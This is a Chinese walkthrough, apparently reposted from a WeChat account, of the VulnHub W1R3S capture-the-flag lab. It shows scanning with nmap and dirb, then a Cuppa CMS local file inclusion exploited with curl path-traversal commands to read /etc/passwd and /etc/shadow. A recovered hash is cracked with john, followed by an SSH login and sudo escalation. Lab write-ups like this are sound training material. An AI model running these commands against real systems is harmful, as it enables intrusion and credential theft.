实验准备
靶机地址:https://www.vulnhub.com/entry/w1r3s-101,220/
下载镜像直接用VMware打开即可
实验环境
攻击机:192.168.31.128
靶机:192.168.31.138
要求
拿到root权限找到flag.txt
复现
探测存活主机
使用命令:nmap -sP 192.168.31.0/24 或是 netdiscover
探测已开放的端口
使用命令:nmap -sS -sV -A -p- 192.168.31.138
已知开放了了21,22,80,3306端口
从web 80开始 访问IP地址 没有什么可用的信息
使用dirb工具攻击目录
使用命令:dirb http://192.168.31.138
找到了几个重要的目录,/administrator、/installation 和 /wordpress /
直接访问http://192.168.31.138/administrator/installation/
该administrator目录原来是Cuppa CMS的安装设置(内容管理信息系统)
我们发现25971.c里面exploit里介绍“Moreover, We could access Configuration.php source code via PHPStream”(此外,我们可以通过PHPStream访问Configuration.php源代码)
这边我们直接利用…访问试试
没什么信息尝试其他方式
使用curl来利用LFI漏洞获取etc / password文件
使用命令curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.31.138/administrator/alerts/alertConfigField.php
找到了第一个 w1r3s继续执行
使用命令:
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.31.138/administrator/alerts/alertConfigField.php
发现:w1r3s:
xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
找到了用户w1r3s的salt密码,我们用john破解此密码
先把这两个命令放入pass文件
使用命令john pass
用户名:w1r3s
密码:computer
前面nmap扫到开了22端口,我们直接进行ssh登陆
使用命令 ssh [email protected]
查看权限
使用sudo -l 查看了一下不需要输入密码 使用su切换就可以了
原文始发于微信公众号(北京路劲科技有限公司):vulhub W1R3S
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论